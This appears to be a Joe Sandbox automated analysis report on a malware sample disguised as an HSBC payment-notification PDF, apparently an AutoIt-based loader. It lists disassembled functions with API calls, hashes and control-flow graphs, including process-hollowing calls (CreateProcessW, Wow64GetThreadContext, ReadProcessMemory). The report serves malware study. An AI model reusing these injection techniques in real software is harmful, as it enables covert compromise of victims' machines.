                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                    • String ID: #$0$AutoIt v3
                                                                                                                                                    • API String ID: 423443420-4155596026
                                                                                                                                                    • Opcode ID: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
                                                                                                                                                    • Instruction ID: 95199bfa57b98a40bbf2a31e3c8143aaf86e5cd3d1ec7ed5ae4cf298cf618104
                                                                                                                                                    • Opcode Fuzzy Hash: e93e5f7a6ad55884e62165224cde73996e1a183fbeab7dcf433d053beda00650
                                                                                                                                                    • Instruction Fuzzy Hash: C4214874D00308AFEB50DFA4EC09F9D7BF4FB08711F1045BAE500A62A1D3B966948F88
                                                                                                                                                    Function 00403766 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                                                                                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$RL
                                                                                                                                                    • API String ID: 1825951767-3937808951
                                                                                                                                                    • Opcode ID: 55abaa5f9173c571b393e83cff65ceb46aa81888e6227bb4e8d9032cc79dbeb6
                                                                                                                                                    • Instruction ID: 217e4a9907ead401ca9bb1711b2953d037e75f133ca24ff269f2dfb0051b1760
                                                                                                                                                    • Opcode Fuzzy Hash: 55abaa5f9173c571b393e83cff65ceb46aa81888e6227bb4e8d9032cc79dbeb6
                                                                                                                                                    • Instruction Fuzzy Hash: DAA13CB29102199ACB04EFA1DC91EEEBB78BF14314F40053FE415B7191DB786A08CBA9
                                                                                                                                                    Function 02F37960 Relevance: 15.3, APIs: 10, Instructions: 336COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(?,02F15A6E), ref: 02F37925
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DirectoryWindows
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3619848164-0
                                                                                                                                                    • Opcode ID: bc0bc8ce5fc02488307495c21cdf45268ec2e15928b69f0da7035c3c16c87435
                                                                                                                                                    • Instruction ID: d5c5b93e3a65cd9d9f7f57cc2c50bbd50d1c1a53f96c79eac7e0e4999a121807
                                                                                                                                                    • Opcode Fuzzy Hash: bc0bc8ce5fc02488307495c21cdf45268ec2e15928b69f0da7035c3c16c87435
                                                                                                                                                    • Instruction Fuzzy Hash: 29A108E1E4D3859FEB3776248C15B75FBB46F026E4F480686E782CA1E2E3245944C7A2
                                                                                                                                                    Function 02F1FA40 Relevance: 13.2, APIs: 8, Instructions: 1187COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1347123831.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f10000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c997beb54c4b9ffab152914948a76879672b44da466c15feb34d8cd0bb1b24e1
                                                                                                                                                    • Instruction ID: 58a7e00f590822e5e380155bd8063b14cd8581f4b6089d12758d7230793acbc4
                                                                                                                                                    • Opcode Fuzzy Hash: c997beb54c4b9ffab152914948a76879672b44da466c15feb34d8cd0bb1b24e1
                                                                                                                                                    • Instruction Fuzzy Hash: 31920672D0C3808FE725CF28C85476ABBE0AF96398FC9465EEB8587692D3759408C753
                                                                                                                                                    Function 0040F76F Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168comCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00420162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
                                                                                                                                                      • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
                                                                                                                                                      • Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
                                                                                                                                                      • Part of subcall function 00420162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
                                                                                                                                                      • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
                                                                                                                                                      • Part of subcall function 00420162: MapVirtualKeyW.USER32(00000012,00000000), ref: 004201C1
                                                                                                                                                      • Part of subcall function 004160F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0040F930), ref: 00416154
                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0040F9CD
                                                                                                                                                    • OleInitialize.OLE32(00000000), ref: 0040FA4A
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004445C8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                    • String ID: <WL$\TL$%I$SL
                                                                                                                                                    • API String ID: 1986988660-4199584472
                                                                                                                                                    • Opcode ID: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
                                                                                                                                                    • Instruction ID: cacde0f204b6a9090d7281a683cdea215049a4593ae0d5a2ec8f4d386ae10ecf
                                                                                                                                                    • Opcode Fuzzy Hash: 66b0d841d80f60ddd55c2de4cf445b91ea5cd604cc27ef35133c2a6073eab96b
                                                                                                                                                    • Instruction Fuzzy Hash: 6581ADB4901A809EC3C8EF3AA944F5D7BE5AB9830A790853F9419C7272E77874C58F1D
                                                                                                                                                    Function 00AC18C8 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 4099 ac18c8-ac1976 call abf2e8 4102 ac197d-ac19a3 call ac27d8 CreateFileW 4099->4102 4105 ac19aa-ac19ba 4102->4105 4106 ac19a5 4102->4106 4113 ac19bc 4105->4113 4114 ac19c1-ac19db VirtualAlloc 4105->4114 4107 ac1af5-ac1af9 4106->4107 4108 ac1b3b-ac1b3e 4107->4108 4109 ac1afb-ac1aff 4107->4109 4115 ac1b41-ac1b48 4108->4115 4111 ac1b0b-ac1b0f 4109->4111 4112 ac1b01-ac1b04 4109->4112 4116 ac1b1f-ac1b23 4111->4116 4117 ac1b11-ac1b1b 4111->4117 4112->4111 4113->4107 4118 ac19dd 4114->4118 4119 ac19e2-ac19f9 ReadFile 4114->4119 4120 ac1b9d-ac1bb2 4115->4120 4121 ac1b4a-ac1b55 4115->4121 4126 ac1b25-ac1b2f 4116->4126 4127 ac1b33 4116->4127 4117->4116 4118->4107 4128 ac19fb 4119->4128 4129 ac1a00-ac1a40 VirtualAlloc 4119->4129 4124 ac1bb4-ac1bbf VirtualFree 4120->4124 4125 ac1bc2-ac1bca 4120->4125 4122 ac1b59-ac1b65 4121->4122 4123 ac1b57 4121->4123 4130 ac1b79-ac1b85 4122->4130 4131 ac1b67-ac1b77 4122->4131 4123->4120 4124->4125 4126->4127 4127->4108 4128->4107 4132 ac1a47-ac1a62 call ac2a28 4129->4132 4133 ac1a42 4129->4133 4136 ac1b87-ac1b90 4130->4136 4137 ac1b92-ac1b98 4130->4137 4135 ac1b9b 4131->4135 4139 ac1a6d-ac1a77 4132->4139 4133->4107 4135->4115 4136->4135 4137->4135 4140 ac1a79-ac1aa8 call ac2a28 4139->4140 4141 ac1aaa-ac1abe call ac2838 4139->4141 4140->4139 4147 ac1ac0 4141->4147 4148 ac1ac2-ac1ac6 4141->4148 4147->4107 4149 ac1ac8-ac1acc CloseHandle 4148->4149 4150 ac1ad2-ac1ad6 4148->4150 4149->4150 4151 ac1ad8-ac1ae3 VirtualFree 4150->4151 4152 ac1ae6-ac1aef 4150->4152 4151->4152 4152->4102 4152->4107
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00AC1999
                                                                                                                                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00AC1BBF
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346722465.0000000000ABF000.00000040.00000020.00020000.00000000.sdmp, Offset: 00ABF000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_abf000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFileFreeVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 204039940-0
                                                                                                                                                    • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                                                                                                    • Instruction ID: 554b747f085736ab59102edfad27f53c99ea8053062a5b9e025c76ba13e70e9b
                                                                                                                                                    • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                                                                                                                                    • Instruction Fuzzy Hash: C6A11370E01209EBDB14CFA4C998FEEBBB5BF49304F208599E101BB281D7759A81CF90
                                                                                                                                                    Function 004039D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 4230 4039d5-403a45 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                    APIs
                                                                                                                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
                                                                                                                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
                                                                                                                                                    • ShowWindow.USER32(00000000,?,?), ref: 00403A38
                                                                                                                                                    • ShowWindow.USER32(00000000,?,?), ref: 00403A41
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$CreateShow
                                                                                                                                                    • String ID: AutoIt v3$edit
                                                                                                                                                    • API String ID: 1584632944-3779509399
                                                                                                                                                    • Opcode ID: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
                                                                                                                                                    • Instruction ID: be7595edf0713681b26590b93805f6b8ae52c85786ba9eb407d90bea5093dcab
                                                                                                                                                    • Opcode Fuzzy Hash: 63781ed4ae1f3443bb25091dad28ecbd1b84819009c2b11518bfb31f136976a9
                                                                                                                                                    • Instruction Fuzzy Hash: 5DF03A705002907EEB705723AC48E2F2EBDD7C6F50B00407EB900E2170C2752881CEB8
                                                                                                                                                    Function 00AC1698 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 146fileCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 4583 ac1698-ac17c9 call abf2e8 call ac1588 CreateFileW 4590 ac17cb 4583->4590 4591 ac17d0-ac17e0 4583->4591 4592 ac1880-ac1885 4590->4592 4594 ac17e7-ac1801 VirtualAlloc 4591->4594 4595 ac17e2 4591->4595 4596 ac1805-ac181c ReadFile 4594->4596 4597 ac1803 4594->4597 4595->4592 4598 ac181e 4596->4598 4599 ac1820-ac185a call ac15c8 call ac0588 4596->4599 4597->4592 4598->4592 4604 ac185c-ac1871 call ac1618 4599->4604 4605 ac1876-ac187e ExitProcess 4599->4605 4604->4605 4605->4592
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00AC1588: Sleep.KERNEL32(000001F4), ref: 00AC1599
                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00AC17BF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346722465.0000000000ABF000.00000040.00000020.00020000.00000000.sdmp, Offset: 00ABF000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_abf000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFileSleep
                                                                                                                                                    • String ID: 8YOXUBURCFQGL6YOHWITVI
                                                                                                                                                    • API String ID: 2694422964-418923717
                                                                                                                                                    • Opcode ID: ae83f053fb2bb7ab371fd79092a7366ac8eeac9c1cd4f81240a8765fc5b3b27e
                                                                                                                                                    • Instruction ID: 7dc99bdae3b8874bb46c3afdaeb789809ee5ac2b3f4e41abc472505a8afe7d42
                                                                                                                                                    • Opcode Fuzzy Hash: ae83f053fb2bb7ab371fd79092a7366ac8eeac9c1cd4f81240a8765fc5b3b27e
                                                                                                                                                    • Instruction Fuzzy Hash: 3851A130E0428DDAEF11DBE4C809BEEBBB9AF15304F10419DE2487B2C1D6BA4B44CB65
                                                                                                                                                    Function 0040407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 4607 40407c-404092 4608 404098-4040ad call 407a16 4607->4608 4609 40416f-404173 4607->4609 4612 4040b3-4040d3 call 407bcc 4608->4612 4613 43d3c8-43d3d7 LoadStringW 4608->4613 4616 43d3e2-43d3fa call 407b2e call 406fe3 4612->4616 4617 4040d9-4040dd 4612->4617 4613->4616 4625 4040ed-40416a call 422de0 call 40454e call 422dbc Shell_NotifyIconW call 405904 4616->4625 4629 43d400-43d41e call 407cab call 406fe3 call 407cab 4616->4629 4619 4040e3-4040e8 call 407b2e 4617->4619 4620 404174-40417d call 408047 4617->4620 4619->4625 4620->4625 4625->4609 4629->4625
                                                                                                                                                    APIs
                                                                                                                                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0043D3D7
                                                                                                                                                      • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                    • _memset.LIBCMT ref: 004040FC
                                                                                                                                                    • _wcscpy.LIBCMT ref: 00404150
                                                                                                                                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                                                    • String ID: Line:
                                                                                                                                                    • API String ID: 3942752672-1585850449
                                                                                                                                                    • Opcode ID: 7c919a651244d8191c8cc595b031c7aba535162d9cd3fbc7f9b82a5c1c0bd2c8
                                                                                                                                                    • Instruction ID: 5bc5e1414a994c2bc470de53771d73d2d6dd5f3f474fa0ef1b1349c24bbf7672
                                                                                                                                                    • Opcode Fuzzy Hash: 7c919a651244d8191c8cc595b031c7aba535162d9cd3fbc7f9b82a5c1c0bd2c8
                                                                                                                                                    • Instruction Fuzzy Hash: 0C31A0B1408305AAD360EB61DC45FDF77E8AB84308F10493FB685A21D1DB78A649CB9F
                                                                                                                                                    Function 00AC0588 Relevance: 8.2, APIs: 5, Instructions: 720processthreadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateProcessW.KERNEL32(?,00000000), ref: 00AC0DB5
                                                                                                                                                    • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00AC0DD9
                                                                                                                                                    • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00AC0DFB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346722465.0000000000ABF000.00000040.00000020.00020000.00000000.sdmp, Offset: 00ABF000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_abf000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2438371351-0
                                                                                                                                                    • Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                                                                                                                    • Instruction ID: 84d855292bcbbb40a15c9e3ca2ebf0e3062da895a41eec35b4075138f141485a
                                                                                                                                                    • Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                                                                                                                                                    • Instruction Fuzzy Hash: C362EA30A14258DBEB24CFA4C851BDEB376EF58300F1091ADD10DEB295E77A9E81CB59
                                                                                                                                                    Function 0042541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1559183368-0
                                                                                                                                                    • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                                                                                                    • Instruction ID: c535a9b74c3be08fb66675131960c2e3f57dfdec9721024cad96d7a05cd33cf3
                                                                                                                                                    • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                                                                                                    • Instruction Fuzzy Hash: 9051BB30B00B15EBCB149E65F84066FB7B2AF40325F94472FF825963D4D7789D918B49
                                                                                                                                                    Function 0040686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00404DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004C52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404E0F
                                                                                                                                                    • _free.LIBCMT ref: 0043E263
                                                                                                                                                    • _free.LIBCMT ref: 0043E2AA
                                                                                                                                                      • Part of subcall function 00406A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406BAD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                                                                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                                                    • API String ID: 2861923089-1757145024
                                                                                                                                                    • Opcode ID: 93fa763c9a00fc5a64a5a7fca18ceb0a7e959a374e7ee9f346a0376fdac685bd
                                                                                                                                                    • Instruction ID: bc1048028433ed9b22f3ef3a1c1c6008be5ef254c57e4e777beaa03c5b85f979
                                                                                                                                                    • Opcode Fuzzy Hash: 93fa763c9a00fc5a64a5a7fca18ceb0a7e959a374e7ee9f346a0376fdac685bd
                                                                                                                                                    • Instruction Fuzzy Hash: 0D916E71901229AFCF04EFA6C8419EEB7B4FF08314F10446FE815AB2E1DB78A955CB59
                                                                                                                                                    Function 004035B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,004035A1,SwapMouseButtons,00000004,?), ref: 004035D4
                                                                                                                                                    • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 004035F5
                                                                                                                                                    • RegCloseKey.KERNEL32(00000000,?,?,004035A1,SwapMouseButtons,00000004,?,?,?,?,00402754), ref: 00403617
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
